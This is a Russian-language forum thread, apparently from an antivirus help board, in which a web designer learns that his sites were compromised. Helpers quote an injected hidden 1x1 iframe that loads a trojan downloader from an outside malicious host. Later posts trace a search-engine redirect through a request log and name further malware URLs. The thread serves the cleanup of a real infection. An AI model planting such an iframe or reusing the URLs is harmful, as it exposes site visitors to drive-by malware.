При открытии сайта JS:Packed-AC [Trj]

[uberdog]

Здравствуйте. Я дизайнер и у меня пара сайтов в сети. Вчера, при заходе на них антивирус выдает следующее:
hxxp://plebania.sitehost.pl/cstrike/models/player/lduke/adminctv1/system/index.php JS : Packed-AC [Trj] Визуально, в хтмл нет никаких ошибок.
Что это может быть и как это лечить? Это у меня вирусы или на сервере?
Примеры .)
grishaeva.com/
creativeangel.ru/

[PavelA]

Это может означать, что Вас вскрыли и заразили.
Все страницы проверяем на лишний код + заходите в раздел "Помогите!".
Провериться не помешает.

[uberdog]

Сайт гришаевой был загружен пол года назад. Я его не перезагружал в последнее время.
Как проверить страницы которые висят в интернет?

[priv8v]

на главной странице сайта creativeangel.ru видим такое:

Код:

<iframe src="http://litedownloadseek.cn/in.cgi?cocacola10" width=1 height=1 style="visibility: hidden">

разве это Ваш код?)

(на сайте гришаевой такой же код, кстати - видимо ломанули ваш комп - угнали акки фтп скорее всего)

PS: сделайте ссылки неактивными!!!

[uberdog]

Гм...Вроде не мой, может фотошоп написал.)
Видимо были вирусы, сейчас нету.
То-есть не активными?
Спасибо за код!

[RiC]

Визуально, в хтмл нет никаких ошибок.

Да ну ... а это (c http://www.grishaeva.com/) -

Код:

<iframe src="hxxp://litedownloadseek.cn/in.cgi?cocacola10" width=1 height=1 style="visibility: hidden"></iframe>

уже так ... мелочь ?

Гм...Вроде не мой, может фотошоп написал.)
Видимо были вирусы, сейчас нету.

Какой шоп ? Это загрузчики троянов с китаёзных сайтов, ссылка с grishaeva.com взята минут 10 назад.

[priv8v]

Видимо были вирусы, сейчас нету.

Может и нет, а может и есть. Откуда Вы знаете?..
Выполнить правила раздела "Помогите!" не помешает в любом случае - много времени это не займет, но если вредоносное ПО на Вашем компьютере присутствует - оно будет удалено с помощью хелперов и АВЗ (т.к то, что Ваш антивирус не находит ничего на компе - это не значит, что там ничего нет)

То-есть не активными?

кликнув по ссылкам в вашем первом сообщении можно перейти на сайты - этого не должно быть, т.к они заражены - поэтому могут заразиться другие. Сотрите перед ними http:// - оставьте только сами названия - так по ним нельзя будет перейти кликнув по ним.

Спасибо за код!

его и аналогичные коды нужно удалить. все пароли поменять.

[uberdog]

Да ну ... а это (c http://www.grishaeva.com/) -

Код:

<iframe src="hxxp://litedownloadseek.cn/in.cgi?cocacola10" width=1 height=1 style="visibility: hidden"></iframe>

уже так ... мелочь ?

Не заметил .)

Добавлено через 21 минуту

Спасибо ребята, я понял и все исправил. Вы нереально круты!!!
Хотя регулярно проверяюсь и AVZ и drWeb и недавно поставил Tool Remooval. Может он виноват .) У меня антивирус аваст.
Кстати на работе Нод 32 ругается на Tool.

[Alexey P.]

Какой шоп ? Это загрузчики троянов с китаёзных сайтов, ссылка с grishaeva.com взята минут 10 назад.

Угу.
Из чистого занудства - это такие же китайцы, как и мы с вами .
Сайты .cn, а трояны чьи угодно.

[senyak]

Методом тыка нашел вот эту ссылку: хттп://a2format.ru//includes/js/dtree/img/system/pdf.php?id=568
От куда можно скачать "EXP/Pidief.IM.1". http://www.virustotal.com/ru/analisi...5f06d0990126e9

[uberdog]

Добрый день.
Теперь, поисковики находят вирусы!
По вашему советы все очистил. На сайте вирусов нет. Когда вбиваешь в строку адрес grishaeva.com/тоже заходит нормально, разные антивриусы реагируют спокойно. Почему гугл не пускает, а яндекс отправляет на ake.kz/in.cgi?7
Проверил код, вроде чистый. И он лайн сканеры ничего не находят.
Может ли ссылка с вирусом лежать в кэше браузеров и оттуда, по старой памяти, отправлять на левые сайты?

[valho]

Сайт попавший в чёрный список по идее исключается из поисковиков, у Вас компик заражён, похоже что DNS-Poisoning

[uberdog]

valho, И чем это лучше убить?
Кьюре Ит не находит ничего.

[valho]

valho, И чем это лучше убить?
Кьюре Ит не находит ничего.

Вам лучше сюда http://virusinfo.info/forumdisplay.php?f=46

[AndreyKa]

uberdog, читайте: http://www.google.com/support/webmas...answer=45432#3

[uberdog]

valho,
Спасибо, попробую. А у вас через яндекс заходит без проблем, за запрос grishaeva.ru?

AndreyKa,
В гугле проверяют, на яндексе отправли лечиться
help.yandex.ru/search/?id=1061421
help.yandex.ru/search/?id=1061422

[valho]

valho,
Спасибо, попробую. А у вас через яндекс заходит без проблем, за запрос grishaeva.ru?

AndreyKa,
В гугле проверяют, на яндексе отправли лечиться
help.yandex.ru/search/?id=1061421
help.yandex.ru/search/?id=1061422

В фарефоксе только, в IE стопорится на clck.yandex.ru/redir/AiuY0DBWFJ4ePaEse6rgeAjgs2pI3DW99KUdgowt9XvqxGyo_r nZJmgDID1if_xg9b3UiNNFJpG_X0Jno3h-93QDOZlrckanJrzqmrPkr7nk5Ski5uggDVzT_r9anGhd?data= UlNrNmk5WktYejR0eWJFYk1LdmtxcUJoVTl3NHZscHY2SkpSOV JGTzhfYVJmUUk0Q01rSjdnMnJTTk9YbTRYM0JHaWZ6QUF3UmVS c3hrczMwb2M5VmpwenZJRlpiQmstY3NvdHhRRUV5Znc&b64e=2 &sign=c8be6d7b3792916df8b0782f3c7548bd&keyno=0
вроде потом стало нормально
Ещё в опере попробовал там адрес высвечивается ake.kz/in.cgi?7
В хроме выводит на esli.tw/1/show.php?s=5eb86eb44c
может это из за гугла?

[uberdog]

Да...через хром и яндекс даже антивирус ругается на ake.kz/in.cgi?7

Что это может быть вообще? Откуда берется редирект?

[valho]

Лог когда жмахаеш на яндексе на grishaeva.com
кста на grishaeva.ru почти тоже самое, нашёл ещё несколько заражённых сайтов там так же всё, только на них видно что они заражены и почему то фигурирует ask.com

Код HTML:

00:00:00.000	grishaeva.com*- Яндекс: нашлось 4211 страниц							
+ 0.000		0.066	550	131	GET	200	image/gif	[url]http://clck.yandex.ru/click/dtype=iweb/path=12.13/cltr=4/reg=225/u=1251751156050/reqid=1251750980-64702741494/*http://grishaeva.com/[/url]
		0.066	550	131	1 request			
00:00:00.166	Ask.com Search Engine - Better Web Search							
+ 0.000		0.202	469	532	GET	301	Redirect to [url]http://ake.kz/in.cgi?7[/url]	[url]http://grishaeva.com/[/url]
+ 0.231		0.186	470	495	GET	302	Redirect to [url]http://ask.com[/url]	[url]http://ake.kz/in.cgi?7[/url]
+ 0.419		0.701	463	12427	GET	200	text/html;charset=UTF-8	[url]http://ask.com/[/url]
+ 1.117		0.181	596	13566	GET	200	image/png	[url]http://sp.ask.com/sh/i/a11/hp/homepage_sprite_04.png[/url]
+ 1.331		0.165	602	486	GET	302	Redirect to [url]http://www.ask.com/inc/js/a11/a11hp_c.r47827.js[/url]	[url]http://ask.com/inc/js/a11/a11hp_c.r47827.js[/url]
+ 1.334		0.358	649	293	GET	200	image/gif	[url]http://wzus1.ask.com/i/i.gif?t=a&d=us&s=a&c=h&ti=2&ai=20014&l=dir&o=0&sv=0a5c4247&ip=558da7a2&ord=6180231[/url]
+ 1.336		0.363	660	1195	GET	302	Redirect to [url]http://wzus1.ask.com/i/i.gif?t=S&d=us&s=a&c=h&l=dir&o=0&sv=0a5c4247&p=homepage&rf=yandex.ru%2Fyandsearch&ord=6180231&wz_uid=1&wz_sid=1&wz_aid=0&uid=0&sid=0&aid=0&askeraser=0&scnt=0&wz_tid=0&[/url]	[url]http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=h&l=dir&o=0&sv=0a5c4247&p=homepage&rf=yandex.ru%2Fyandsearch&ord=6180231[/url]
+ 1.340		0.367	597	477	GET	302	Redirect to [url]http://www.ask.com/inc/js/a11/swfobject.js[/url]	[url]http://ask.com/inc/js/a11/swfobject.js[/url]
+ 1.343		0.256	372	603	GET	200	text/html	[url]http://p.opt.fimserve.com/bht/?px=1196&v=1&rnd=18915[/url]
+ 1.347		0.188	357	9481	GET	200	text/javascript	[url]http://www.google-analytics.com/ga.js[/url]
+ 1.565		0.263	621	26109	GET	200	application/x-javascript	[url]http://www.ask.com/inc/js/a11/a11hp_c.r47827.js[/url]
+ 1.731		0.337	888	293	GET	200	image/gif	[url]http://wzus1.ask.com/i/i.gif?t=S&d=us&s=a&c=h&l=dir&o=0&sv=0a5c4247&p=homepage&rf=yandex.ru%2Fyandsearch&ord=6180231&wz_uid=1&wz_sid=1&wz_aid=0&uid=0&sid=0&aid=0&askeraser=0&scnt=0&wz_tid=0&[/url]
+ 1.764		0.098	740	2471	GET	200	application/x-javascript	[url]http://www.ask.com/inc/js/a11/swfobject.js[/url]
		2.068	7484	68428	13 requests			
 00:00:01.526		0.361	589	453	GET	302	Redirect to [url]http://www.ask.com/favicon.ico[/url]	[url]http://ask.com/favicon.ico[/url]
 00:00:01.965		0.174	702	1396	GET	200	text/plain	[url]http://www.ask.com/favicon.ico[/url]
00:00:02.087	Ask.com Search Engine - Better Web Search							
+ 0.000		0.198	721	17674	GET	200	image/png	[url]http://sp.ask.com/sh/i/a11/hp/peel/peel_newskin_6.png[/url]
		0.198	721	17674	1 request			
 00:00:02.106		0.181	713	452	GET	302	Redirect to [url]http://www.ask.com/favicon.ico[/url]	[url]http://ask.com/favicon.ico[/url]
00:00:02.112	Ask.com Search Engine - Better Web Search							
+ 0.000		120.303	725	7255	GET	200	text/html;charset=UTF-8	[url]http://www.ask.com/hpstatic[/url]
+ 0.155		0.093	911	328	GET	200	image/gif	[url]http://www.google-analytics.com/__utm.gif?utmwv=4.3.1&utmn=1920798491&utmhn=ask.com&utmcs=UTF-8&utmsr=1024x600&utmsc=32-bit&utmul=ru&utmje=1&utmfl=10.0%20r32&utmcn=1&utmdt=Ask.com%20Search%20Engine%20-%20Better%20Web%20Search&utmhid=1506658785&utmr=http://yandex.ru/yandsearch?text=grishaeva.com&stpar2=%2Fh0%2Ftm8%2Fs1&stpar4=%2Fs1&utmp=/&utmac=UA-5081537-3&utmcc=__utma%3D252994457.3672992468607816000.1251751158.1251751158.1251751158.1%3B%2B__utmz%3D252994457.1251751158.1.1.utmcsr%3Dyandex%7Cutmccn%3D(organic)%7Cutmcmd%3Dorganic%7Cutmctr%3Dgrishaeva.com%3B[/url]
+ 2:00.278		0.096	931	1098	GET	200	application/x-javascript	[url]http://www.ask.com/inc/js/a10f/blogsadvanced_c.r29093.js[/url]
+ 2:00.403		0.139	947	10988	GET	200	image/gif	[url]http://sp.ask.com/sh/i/a10f/hp/spinner.gif[/url]
+ 2:00.409		0.159	933	339	GET	200	image/gif	[url]http://sp.ask.com/i/pixl.gif[/url]
+ 2:00.412		0.187	946	2661	GET	200	image/png	[url]http://sp.ask.com/sh/i/a11/hp/preview.png[/url]
+ 2:00.418		0.208	947	4101	GET	200	image/png	[url]http://sp.ask.com/sh/i/a10f/hp/preview.png[/url]
+ 2:00.854		0.172	956	496	GET	302	Redirect to [url]http://www.ask.com/inc/js/a11/a11mystuff_c.r47005.js[/url]	[url]http://ask.com/inc/js/a11/a11mystuff_c.r47005.js[/url]
+ 2:01.373		0.179	975	10420	GET	200	application/x-javascript	[url]http://www.ask.com/inc/js/a11/a11mystuff_c.r47005.js[/url]
+ 2:01.584		0.091	924	572	GET	200	text/css;charset=UTF-8	[url]http://www.ask.com/dcss/a11/skinshp.r32645.css[/url]
+ 2:01.587		*	923	0	GET	*	*	[url]http://www.ask.com/dcss/a11/dialog.r47126.css[/url]
+ 2:01.591		*	928	0	GET	*	*	[url]http://www.ask.com/dcss/a11/skinssprite.r46242.css[/url]
+ 2:01.595		*	0	0	GET	*	*	[url]http://www.ask.com/dcss/a11/settings.r47126.css[/url]
+ 2:01.599		*	0	0	GET	*	*	[url]http://www.ask.com/dcss/a11/askeraser.r30356.css[/url]
+ 2:01.603		*	0	0	GET	*	*	[url]http://www.ask.com/dcss/a11/signin.r45653.css[/url]
+ 2:01.607		0.160	926	1001	GET	200	text/css;charset=UTF-8	[url]http://www.ask.com/dcss/a11/skinshare.r34027.css[/url]
+ 2:01.612		*	927	0	GET	*	*	[url]http://www.ask.com/dcss/a11/skinfriend.r34027.css[/url]
+ 2:01.616		*	0	0	GET	*	*	[url]http://www.ask.com/dcss/a11/sendemailmessage.r39410.css[/url]
+ 2:01.619		*	0	0	GET	*	*	[url]http://www.ask.com/dcss/a11/forgotpasswd.r45653.css[/url]
+ 2:01.622		*	0	0	GET	*	*	[url]http://www.ask.com/dcss/a11/forgotemailmessage.r45262.css[/url]
		121.776	12899	39259	20 requests			
 00:00:04.524		0.176	968	452	GET	302	Redirect to [url]http://www.ask.com/favicon.ico[/url]	[url]http://ask.com/favicon.ico[/url]
 00:00:04.717		0.066	0	0	GET	(Cache)	text/plain	[url]http://www.ask.com/favicon.ico[/url]
 00:00:32.418		0.967	454	175136	GET	200	application/vnd.google.safebrowsing-chunk	[url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-malware-shavar_a_13761-13840.13761-13840.:[/url]
 00:00:34.368		0.913	454	191238	GET	200	application/vnd.google.safebrowsing-chunk	[url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-malware-shavar_a_13841-13920.13841-13920.:[/url]
 00:00:36.192		0.163	465	27102	GET	200	application/vnd.google.safebrowsing-chunk	[url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-malware-shavar_a_13921-14080.13921-13940.13941-14080:[/url]
 00:00:36.502		0.093	452	14574	GET	200	application/vnd.google.safebrowsing-chunk	[url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-phish-shavar_s_46401-46560.46401-46560.:[/url]
 00:00:36.646		0.124	452	18152	GET	200	application/vnd.google.safebrowsing-chunk	[url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-phish-shavar_s_46561-46720.46561-46720.:[/url]
 00:00:36.818		0.081	452	11281	GET	200	application/vnd.google.safebrowsing-chunk	[url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-phish-shavar_s_46721-46880.46721-46880.:[/url]
 00:00:36.926		0.032	463	905	GET	200	application/vnd.google.safebrowsing-chunk	[url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-phish-shavar_s_46881-47040.46881-46888.46889-47040:[/url]
 00:00:36.968		0.320	476	63790	GET	200	application/vnd.google.safebrowsing-chunk	[url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-phish-shavar_a_64321-64480.64321-64354,64356-64428,64430-64480.:[/url]
 00:00:37.542		0.297	488	59145	GET	200	application/vnd.google.safebrowsing-chunk	[url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-phish-shavar_a_64481-64640.64481-64577,64579-64580,64582-64587,64589-64640.:[/url]
00:01:14.183	[url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-phish-shavar_s_46721-46880.46721-46880.:[/url]							
+ 0.000		1.519	452	11281	GET	200	application/vnd.google.safebrowsing-chunk	[url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-phish-shavar_s_46721-46880.46721-46880.:[/url]
		1.519	452	11281	1 request			
 00:01:38.110		0.131	560	19027	GET	200	application/vnd.google.safebrowsing-chunk	[url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-phish-shavar_a_64641-64800.64641-64661,64663-64682,64684-64695,64697-64700,64704-64710,64712-64764,64766-64769,64771-64772,64774-64775,64777-64800.:[/url]
 00:01:38.477		0.181	512	32422	GET	200	application/vnd.google.safebrowsing-chunk	[url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-phish-shavar_a_64801-64960.64801-64817,64819-64823,64826-64848,64850-64899,64902-64943,64945-64960.:[/url]
 00:01:38.806		0.176	463	32483	GET	200	application/vnd.google.safebrowsing-chunk	[url]http://safebrowsing-cache.google.com/safebrowsing/rd/goog-phish-shavar_a_64961-65120.64961-65061.65062-65120:[/url]
 00:01:41.705		0.338	938	453	GET	302	Redirect to [url]http://www.ask.com/favicon.ico[/url]	[url]http://ask.com/favicon.ico[/url]
 00:01:42.043		0.021	0	0	GET	(Cache)	text/plain	[url]http://www.ask.com/favicon.ico[/url]
 00:01:49.270		0.172	938	452	GET	302	Redirect to [url]http://www.ask.com/favicon.ico[/url]	[url]http://ask.com/favicon.ico[/url]
 00:01:49.442		0.029	0	0	GET	(Cache)	text/plain	[url]http://www.ask.com/favicon.ico[/url]
 00:02:02.979		0.340	938	453	GET	302	Redirect to [url]http://www.ask.com/favicon.ico[/url]	[url]http://ask.com/favicon.ico[/url]
 00:02:03.490		0.003	0	0	GET	(Cache)	text/plain	[url]http://www.ask.com/favicon.ico[/url]

Уберите вот это grishaeva.com/favicon.ico и посмотрите как будет яндекс выдавать
оттуда редирект идёт прямо на ake.kz
Млин он там на самом видном месте
//<link rel="shortcut Icon" href="/favicon.ico" type="image/x-icon">
Сто пудов Вам её подменили так как её не видно при заходе на сайт, а на яндексе в кэше она есть

[uberdog]

Недели две назад переименовал favicon.ico в iconka. Видмо не помогло.
Спасибо, попробую удалить.